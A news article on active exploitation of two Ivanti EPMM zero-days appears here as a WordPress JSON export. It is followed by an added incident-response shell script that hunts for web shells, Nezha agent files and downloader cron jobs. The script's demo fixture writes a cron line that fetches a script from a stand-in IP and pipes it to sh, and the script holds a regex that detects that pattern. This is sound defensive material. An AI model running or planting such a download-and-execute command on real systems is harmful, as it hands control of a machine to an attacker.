{"id":7211,"date":"2026-02-23T10:32:31","date_gmt":"2026-02-23T10:32:31","guid":{"rendered":"https:\/\/cybersecurityinfocus.com\/?p=7211"},"modified":"2026-02-23T10:32:31","modified_gmt":"2026-02-23T10:32:31","slug":"attackers-exploit-ivanti-epmm-zero-days-to-seize-control-of-mdm-servers","status":"publish","type":"post","link":"https:\/\/cybersecurityinfocus.com\/?p=7211","title":{"rendered":"Attackers exploit Ivanti EPMM zero-days to seize control of MDM servers"},"content":{"rendered":"<div>\n<div class=\"grid grid--cols-10@md grid--cols-8@lg article-column\">\n<div class=\"col-12 col-10@md col-6@lg col-start-3@lg\">\n<div class=\"article-column__content\">\n<div class=\"container\"><\/div>\n<p>Attackers are actively exploiting two critical zero-day vulnerabilities in Ivanti\u2019s Endpoint Manager Mobile (EPMM) to gain unauthenticated control of enterprise mobile device management infrastructure and install backdoors engineered to persist even after organizations apply available patches.<\/p>\n<p>\u201cTwo critical zero-day vulnerabilities (<a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2026-1281\" target=\"_blank\" rel=\"noopener\">CVE-2026-1281<\/a>\u00a0and\u00a0<a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2026-1340\" target=\"_blank\" rel=\"noopener\">CVE-2026-1340<\/a>) affecting Ivanti Endpoint Manager Mobile (EPMM) are being actively exploited in the wild, affecting enterprise mobile fleets and corporate networks,\u201d Palo Alto Networks\u2019 Unit 42 threat research team <a href=\"https:\/\/unit42.paloaltonetworks.com\/ivanti-cve-2026-1281-cve-2026-1340\/\">said in an advisory<\/a>. 
\u201cThese vulnerabilities allow unauthenticated attackers to remotely execute arbitrary code on target servers, granting them full control over mobile device management (MDM) infrastructure without requiring user interaction or credentials.\u201d<\/p>\n<p>EPMM, formerly known as MobileIron Core, is a mobile device management platform that enterprises use to manage and enforce security policies on employee smartphones and tablets.<\/p>\n<p>Palo Alto Networks\u2019 attack surface management platform Cortex Xpanse found more than 4,400 EPMM instances currently exposed on the public internet. Compromise of the platform gives attackers access to device policies, credentials, and metadata across an organization\u2019s entire mobile fleet, Unit 42 warned in the advisory.<\/p>\n<p>Both vulnerabilities carry a CVSS score of 9.8 and allow unauthenticated attackers to execute arbitrary commands on exposed EPMM servers without any user interaction or valid credentials.<\/p>\n<p>Ivanti acknowledged the attacks when it released emergency patches in late January, but described the initial impact as limited. \u201cWe are aware of a very limited number of customers whose solution has been exploited at the time of disclosure,\u201d the company said in its <a href=\"https:\/\/forums.ivanti.com\/s\/article\/Security-Advisory-Ivanti-Endpoint-Manager-Mobile-EPMM\">security advisory<\/a>.<\/p>\n<p>Both vulnerabilities stem from unsafe Bash script handling in legacy Apache web server configurations, according to Unit 42. CVE-2026-1281 targets the In-House Application Distribution feature; CVE-2026-1340 exploits the same flaw class through a separate script handling the Android File Transfer mechanism. 
\u201cAlthough the root cause is the same, they reside in two distinct scripts handling different features,\u201d the advisory explained.<\/p>\n<h2 class=\"wp-block-heading\">From scan to backdoor<\/h2>\n<p>Unit 42 documented threat actors moving rapidly from automated scanning to initial access and then escalating quickly to deploy persistent backdoors designed to outlast patching cycles.<\/p>\n<p>After gaining initial access, attackers immediately attempted to download and execute a second-stage payload. \u201cThis second stage typically installs a web shell, a cryptominer, or a persistent backdoor to grant the attacker control of the appliance,\u201d the advisory said.<\/p>\n<p>Unit 42 also said attackers deployed the Nezha open-source monitoring agent to maintain visibility over compromised systems.<\/p>\n<p>The attackers targeted sectors including state and local government, healthcare, manufacturing, professional services, and high technology across the United States, Germany, Australia, and Canada, the advisory added.<\/p>\n<p>Unit 42 also warned that proof-of-concept exploit code for both CVEs is already publicly available, making broader exploitation likely as more threat actors adopt working exploits.<\/p>\n<h2 class=\"wp-block-heading\">Patch, but verify first<\/h2>\n<p>Unit 42 directed organizations to Ivanti\u2019s security advisory for remediation guidance, which recommends applying version-specific RPM patches for EPMM 12.x branches that require no appliance downtime. Ivanti cautioned, however, that the patch does not survive a version upgrade and must be reinstalled if the software is updated. 
\u201cThe permanent fix for this vulnerability will be included in the next product release: 12.8.0.0 expected in Q1 2026.\u201d<\/p>\n<p>Ivanti also warned in its advisory that while its Sentry mobile traffic gateway is not directly vulnerable, EPMM holds command execution permissions on connected Sentry systems. \u201cIf an EPMM deployment has been compromised, the attackers might have compromised Ivanti Sentry as well,\u201d the company said.<\/p>\n<p>For organizations that suspect compromise, the Ivanti advisory advised against attempting to clean affected systems. Instead, it recommended restoring from a known-good backup or performing a full rebuild, followed by a complete reset of all account passwords, service credentials, and public certificates.<\/p>\n<h2 class=\"wp-block-heading\">A familiar pattern<\/h2>\n<p>The targeting of EPMM follows a pattern that will be familiar to Ivanti customers. The product has been exploited at scale before \u2014 in 2023, state-sponsored attackers used EPMM zero-days to break into <a href=\"https:\/\/www.csoonline.com\/article\/647105\/governments-scramble-to-patch-ivanti-endpoint-manager-mobile-security-flaw.html\">Norwegian government networks<\/a>, and separate flaws were <a href=\"https:\/\/www.csoonline.com\/article\/3985912\/ivanti-patches-two-epmm-flaws-exploited-in-the-wild.html\">again exploited<\/a> in the wild last year. 
<\/p>\n<p>Ivanti\u2019s Connect Secure VPN product has had a similarly troubled record, with <a href=\"https:\/\/www.csoonline.com\/article\/1307425\/attackers-target-new-ivanti-xxe-vulnerability-days-after-patch.html\">Chinese APT groups<\/a> exploiting zero-days in back-to-back campaigns that eventually led the US government to order federal agencies to disconnect Ivanti VPN products entirely in February 2024.<\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>Attackers are actively exploiting two critical zero-day vulnerabilities in Ivanti\u2019s Endpoint Manager Mobile (EPMM) to gain unauthenticated control of enterprise mobile device management infrastructure and install backdoors engineered to persist even after organizations apply available patches. \u201cTwo critical zero-day vulnerabilities (CVE-2026-1281\u00a0and\u00a0CVE-2026-1340) affecting Ivanti Endpoint Manager Mobile (EPMM) are being actively exploited in the wild, affecting [&hellip;]<\/p>\n","protected":false},"author":0,"featured_media":7212,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[],"class_list":["post-7211","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-education"],"_links":{"self":[{"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/posts\/7211"}],"collection":[{"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"replies":[{"embeddable":true,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=7211"}],"version-history":[{"count":0,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/posts\/7211\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/cybersecurityinfocus.com\/index.php
?rest_route=\/wp\/v2\/media\/7212"}],"wp:attachment":[{"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=7211"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=7211"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=7211"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
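The "From scan to backdoor" and "Patch, but verify first" sections above describe post-exploitation artifacts (a dropped web shell, a downloaded second stage, a persistent backdoor, the Nezha agent) and Ivanti's advice to rebuild rather than clean. The following is an added example, not code from the article, from Ivanti or from Unit 42: a minimal POSIX shell triage sweep that an incident responder might run against an appliance's filesystem (or a mounted disk image) to gather leads before deciding on a rebuild. The file extensions it treats as web-shell candidates, the `*nezha*` name pattern for the Nezha agent, and the cron locations it greps are assumptions for illustration, and the sample directory tree it builds is constructed so the script runs offline.

```shell
#!/bin/sh
# Added example, not Ivanti's or Unit 42's tooling. Assumptions for illustration:
#   - a web shell dropped on a Linux appliance is likely a .jsp/.jspx/.php/.cgi/.sh file
#   - the Nezha agent installs a binary/unit whose name contains "nezha"
#   - second-stage droppers often land in cron as "curl|wget ... | sh"
# Nothing here proves compromise; every hit is a lead for the responder.

# List script-like files under $1 modified within the last $2 days (default 7).
# On an appliance that only changes at patch time, anything recent deserves a look.
recent_web_scripts() {
    root="$1"; days="${2:-7}"
    find "$root" -type f \( -name '*.jsp' -o -name '*.jspx' -o -name '*.php' \
        -o -name '*.cgi' -o -name '*.sh' \) -mtime "-$days" 2>/dev/null | sort
}

# Files or symlinks under $1 whose name matches the assumed Nezha agent naming.
nezha_artifacts() {
    root="$1"
    find "$root" \( -type f -o -type l \) -iname '*nezha*' 2>/dev/null | sort
}

# Cron entries that fetch something from the network and pipe it into a shell.
# -r recursive, -h no filename prefix, -E extended regex; missing paths are ignored.
downloader_cron_entries() {
    root="$1"
    grep -rhE '(curl|wget)[^|]*[|][[:space:]]*(sh|bash)' \
        "$root/etc/cron.d" "$root/etc/crontab" "$root/var/spool/cron" 2>/dev/null | sort
}

# Run every check against a root directory ("/" on the appliance, or a mount point
# of an image). Prints hits per check; returns 0 when clean, 1 when anything matched.
triage() {
    root="$1"; hits=0
    for check in recent_web_scripts nezha_artifacts downloader_cron_entries; do
        out=$("$check" "$root")
        if [ -n "$out" ]; then
            hits=$((hits + 1))
            printf '[%s]\n%s\n' "$check" "$out"
        fi
    done
    [ "$hits" -eq 0 ]
}

# Constructed sample tree so the example runs offline: a freshly written JSP
# (suspicious), a JSP dated 2020 (expected), a nezha-named systemd unit, and a
# cron job that downloads and executes a script. Prints the tree's root path.
build_sample_tree() {
    root=$(mktemp -d)
    mkdir -p "$root/opt/app/webroot" "$root/etc/systemd/system" "$root/etc/cron.d"
    : > "$root/opt/app/webroot/fresh.jsp"
    : > "$root/opt/app/webroot/legacy.jsp"
    touch -t 202001010000 "$root/opt/app/webroot/legacy.jsp"
    : > "$root/etc/systemd/system/nezha-agent.service"
    printf '* * * * * root curl -s http://203.0.113.10/s | sh\n' > "$root/etc/cron.d/update"
    printf '%s\n' "$root"
}

# Usage: sh triage.sh --demo   (sweeps the constructed tree, then removes it)
#        . ./triage.sh; triage /mnt/image   (against a mounted appliance image)
if [ "${1:-}" = "--demo" ]; then
    demo_root=$(build_sample_tree)
    if triage "$demo_root"; then echo "clean"; else echo "HITS FOUND"; fi
    rm -rf "$demo_root"
fi
```

Run it from a known-good shell, not from the possibly compromised appliance's own tooling, and treat the output as a set of leads: a hit supports the restore-or-rebuild decision Ivanti recommends, while a clean sweep does not clear the host, since a backdoor can live anywhere these three checks do not look.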